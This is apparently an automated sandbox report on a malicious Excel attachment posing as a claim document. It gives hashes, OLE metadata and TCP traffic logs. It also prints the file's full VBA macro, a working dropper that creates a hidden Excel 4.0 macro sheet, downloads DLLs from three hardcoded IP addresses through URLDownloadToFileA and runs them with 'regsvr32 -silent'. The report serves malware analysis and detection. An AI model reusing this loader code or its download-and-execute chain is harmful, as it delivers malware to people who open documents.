                SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
                Malicious:true
                C:\Users\user\Fiosa2.der
                Process:C:\Windows\SysWOW64\explorer.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):495616
                Entropy (8bit):1.3741485480829125
                Encrypted:false
                SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
                MD5:15C440CEBA523F1FA008FAA03D09AC99
                SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
                SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
                SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
                Malicious:true

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Fri Sep 24 10:05:02 2021, Security: 0
                Entropy (8bit):7.828790165256729
                TrID:
                • Microsoft Excel sheet (30009/1) 47.99%
                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                File name:Claim-1368769328-09242021.xls
                File size:419328
                MD5:20b670d4bfd3e5480e7c27cba0c3e11e
                SHA1:167b4de3034917861c38fa6812bd43d5a4ad6a18
                SHA256:e2de3e8aee223f11eddfbb081fa78779b71ba5cb1d3ef657e9b8b3f16406b09a
                SHA512:230714c59a8b5d5656f3c8f93c3fbc04ed8235f28b8887a324145dc4c5a6158d5c1da9b3e907226d029265ee6ad57d616ab8291c0c6414ea603d30c0c4b20b5a
                SSDEEP:6144:Fk3hOdsylKlgxopeiBNhZF+E+W2kdAKTwapS+PS82DPz6ST4+e3G0Sb8duSgcVwh:e5Z8etSwuSgcfPwJjxwrcNDTfsXo/xb

                File Icon

                Icon Hash:e4eea286a4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "Claim-1368769328-09242021.xls"

                Indicators

                Has Summary Info:True
                Application Name:Microsoft Excel
                Encrypted Document:False
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Code Page:1251
                Author:Test
                Last Saved By:Test
                Create Time:2015-06-05 18:17:20
                Last Saved Time:2021-09-24 09:05:02
                Creating Application:Microsoft Excel
                Security:0

                Document Summary

                Document Code Page:1251
                Thumbnail Scaling Desired:False
                Company:
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:1048576

                Streams with VBA

                VBA File Name: UserForm1, Stream Size: -1
                General
                Stream Path:_VBA_PROJECT_CUR/UserForm1
                VBA File Name:UserForm1
                Stream Size:-1
                Data ASCII:
                Data Raw:
                VBA Code
                Attribute VB_Name = "UserForm1"
                Attribute VB_Base = "0{6E2E223A-A629-4255-BA17-B75486DE444A}{A668B021-7649-4DE4-8D02-89E3EA2CFA2A}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = False
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = False
                VBA File Name: Module1, Stream Size: 4112
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                VBA File Name:Module1
                Stream Size:4112
                VBA Code
                Attribute VB_Name = "Module1"
                
                Sub auto_open()
                On Error Resume Next
                Drezden = "="
                Naret = "EXEC"
                Application.ScreenUpdating = False
                Gert
                Sheets("Sheet5").Visible = False
                Sheets("Sheet5").Range("A1:M100").Font.Color = vbWhite
                
                Sheets("Sheet5").Range("H24") = UserForm1.Label1.Caption
                Sheets("Sheet5").Range("H25") = UserForm1.Label3.Caption
                Sheets("Sheet5").Range("H26") = UserForm1.Label4.Caption
                
                Sheets("Sheet5").Range("K17") = "=NOW()"
                Sheets("Sheet5").Range("K18") = ".dat"
                Sheets("Sheet5").Range("K18") = ".dat"
                
                
                Sheets("Sheet5").Range("H35") = "=HALT()"
                Sheets("Sheet5").Range("I9") = UserForm1.Label2.Caption
                Sheets("Sheet5").Range("I10") = UserForm1.Caption
                Sheets("Sheet5").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
                Sheets("Sheet5").Range("I12") = "Byukilos"
                Sheets("Sheet5").Range("G10") = "..\Fiosa.der"
                Sheets("Sheet5").Range("G11") = "..\Fiosa1.der"
                Sheets("Sheet5").Range("G12") = "..\Fiosa2.der"
                Sheets("Sheet5").Range("I17") = "regsvr32 -silent ..\Fiosa.der"
                Sheets("Sheet5").Range("I18") = "regsvr32 -silent ..\Fiosa1.der"
                Sheets("Sheet5").Range("I19") = "regsvr32 -silent ..\Fiosa2.der"
                Sheets("Sheet5").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
                Sheets("Sheet5").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
                Sheets("Sheet5").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
                Sheets("Sheet5").Range("H9") = Drezden & "REGISTER(I9,I10&J10,I11,I12,,1,9)"
                Sheets("Sheet5").Range("H17") = Drezden & Naret & "(I17)"
                Sheets("Sheet5").Range("H18") = Drezden & Naret & "(I18)"
                Sheets("Sheet5").Range("H19") = Drezden & Naret & "(I19)"
                
                
                Application.Run Sheets("Sheet5").Range("H1")
                
                End Sub
                
                Sub auto_close()
                On Error Resume Next
                Application.ScreenUpdating = True
                   Application.DisplayAlerts = False
                   Sheets("Sheet5").Delete
                   Application.DisplayAlerts = True
                End Sub
                
                Function Gert()
                Set Fera = Excel4IntlMacroSheets
                Fera.Add.Name = "Sheet5"
                End Function
                VBA File Name: Sheet1, Stream Size: 991
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1
                Stream Size:991
                VBA Code
                Attribute VB_Name = "Sheet1"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                VBA File Name: ThisWorkbook, Stream Size: 2774
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                VBA File Name:ThisWorkbook
                Stream Size:2774
                VBA Code
                Attribute VB_Name = "ThisWorkbook"
                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                Option Explicit
                
                Private m_openAlreadyRan As Boolean
                Private m_isOpenDelayed As Boolean
                
                Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
                End Sub
                
                Private Sub asWorkbook_Activateas()
                    On Error Resume Next
                
                    If m_isOpenDelayed Then
                        m_isOpenDelayed = False
                        InitWorkbook
                    End If
                End Sub
                
                Private Sub saWorkbook_Opensa()
                    On Error Resume Next
                
                    m_openAlreadyRan = True
                    Dim objProtectedViewWindow As ProtectedViewWindow
                    '
                    On Error GoTo 0
                    '
                    m_isOpenDelayed = Not (objProtectedViewWindow Is Nothing)
                    If Not m_isOpenDelayed Then InitWorkbook
                End Sub
                
                Private Sub ssaaInitWorkbookssaa()
                    On Error Resume Next
                
                    If VBA.Val(Application.Version) < 12 Then
                        Me.Close False
                        Exit Sub
                    End If
                    '
                        'Other code
                        '
                        '
                        '
                End Sub
                VBA File Name: UserForm1, Stream Size: 1180
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/UserForm1
                VBA File Name:UserForm1
                Stream Size:1180
                VBA Code
                Attribute VB_Name = "UserForm1"
                Attribute VB_Base = "0{6E2E223A-A629-4255-BA17-B75486DE444A}{A668B021-7649-4DE4-8D02-89E3EA2CFA2A}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = False
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = False

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 108
                General
                Stream Path:\x1CompObj
                File Type:data
                Stream Size:108
                Entropy:4.18849998853
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:244
                Entropy:2.65175227267
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:208
                Entropy:3.30164724619
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . 3 . B # . . . . . . . . . . .
                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 391141
                General
                Stream Path:Workbook
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:391141
                Entropy:7.94597570807
                Base64 Encoded:True
                Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . d . % 8 . . . . . . . X . @
                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 661
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:661
                Entropy:5.27224586563
                Base64 Encoded:True
                Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                File Type:data
                Stream Size:116
                Entropy:3.35524796933
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
                Stream Path: _VBA_PROJECT_CUR/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                General
                Stream Path:_VBA_PROJECT_CUR/UserForm1/\x1CompObj
                File Type:data
                Stream Size:97
                Entropy:3.61064918306
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                Stream Path: _VBA_PROJECT_CUR/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 301
                General
                Stream Path:_VBA_PROJECT_CUR/UserForm1/\x3VBFrame
                File Type:ASCII text, with CRLF line terminators
                Stream Size:301
                Entropy:4.64742015018
                Base64 Encoded:True
                Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
                Stream Path: _VBA_PROJECT_CUR/UserForm1/f, File Type: data, Stream Size: 263
                General
                Stream Path:_VBA_PROJECT_CUR/UserForm1/f
                File Type:data
                Stream Size:263
                Entropy:3.59027175124
                Base64 Encoded:False
                Data ASCII:. . $ . . . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . O
                Stream Path: _VBA_PROJECT_CUR/UserForm1/o, File Type: data, Stream Size: 272
                General
                Stream Path:_VBA_PROJECT_CUR/UserForm1/o
                File Type:data
                Stream Size:272
                Entropy:3.7315998228
                Base64 Encoded:True
                Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 3 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 1 1 . 9 0 . 1 4 8 . 1 0 4 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 5 1 . 8 9 . 1 1 5 . 1 1 1 / . . . . . . . . . . . . . . . 5 . . . . . . .
                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3819
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                File Type:data
                Stream Size:3819
                Entropy:4.49037503963
                Base64 Encoded:False
                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2035
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                File Type:data
                Stream Size:2035
                Entropy:3.42846113886
                Base64 Encoded:False
                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
                General
                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1
                File Type: data
                Stream Size: 138
                Entropy: 1.48462480805
                Base64 Encoded: False
                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
                General
                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2
                File Type: data
                Stream Size: 264
                Entropy: 1.9985725068
                Base64 Encoded: False
                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
                General
                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3
                File Type: data
                Stream Size: 256
                Entropy: 1.80540314317
                Base64 Encoded: False
                Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: SVR2 executable (USS/370) not stripped - version 12587540, Stream Size: 865
                General
                Stream Path: _VBA_PROJECT_CUR/VBA/dir
                File Type: SVR2 executable (USS/370) not stripped - version 12587540
                Stream Size: 865
                Entropy: 6.55213343791
                Base64 Encoded: True

                Network Behavior

                Network Port Distribution

                TCP Packets

                Timestamp    Source Port    Dest Port    Source IP    Dest IP
                Sep 24, 2021 17:27:00.472402096 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472408056 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472415924 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472426891 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472466946 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472485065 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472527981 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472589970 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472594976 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472646952 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472650051 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472656965 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472702980 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472721100 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472762108 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472769976 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472826004 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472827911 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472882032 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472887039 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472923040 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472944975 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472961903 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472975969 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473020077 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473021030 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473057032 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473093987 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473078012 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473129988 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473139048 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473146915 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473186970 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473190069 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473236084 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473272085 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473279953 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473292112 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473309040 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473325014 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473347902 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473362923 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473397017 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473407984 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473438025 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473474979 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473462105 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473521948 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473526955 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473534107 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473566055 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473584890 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473602057 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473615885 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473639965 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473661900 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473676920 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473692894 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473728895 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473732948 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473766088 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473788023 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473803043 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473817110 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473846912 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.680790901 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680830002 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680847883 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680881023 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680896044 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680911064 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680932045 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680953026 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680973053 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680999041 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681021929 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681042910 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681063890 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681083918 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681102991 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681123972 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681144953 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681170940 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681193113 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681212902 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681235075 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681256056 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681274891 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681296110 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681315899 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681340933 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681363106 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681382895 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681402922 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681423903 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681442976 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681467056 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681485891 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681510925 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681533098 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681536913 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.681555033 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681673050 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.888952971 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889022112 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889060974 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889108896 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889153004 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889189959 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889229059 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889223099 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889267921 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889293909 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889301062 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889305115 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889306068 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889326096 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889343977 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889378071 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889381886 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889430046 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889451981 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889461994 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889467955 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889473915 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889513016 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889533043 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889552116 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889566898 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889594078 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889602900 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889631987 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889643908 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889671087 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889672041 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889708042 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889755964 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889758110 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889767885 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889797926 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889806032 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889837980 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889839888 CEST4916780192.168.2.22190.14.37.173
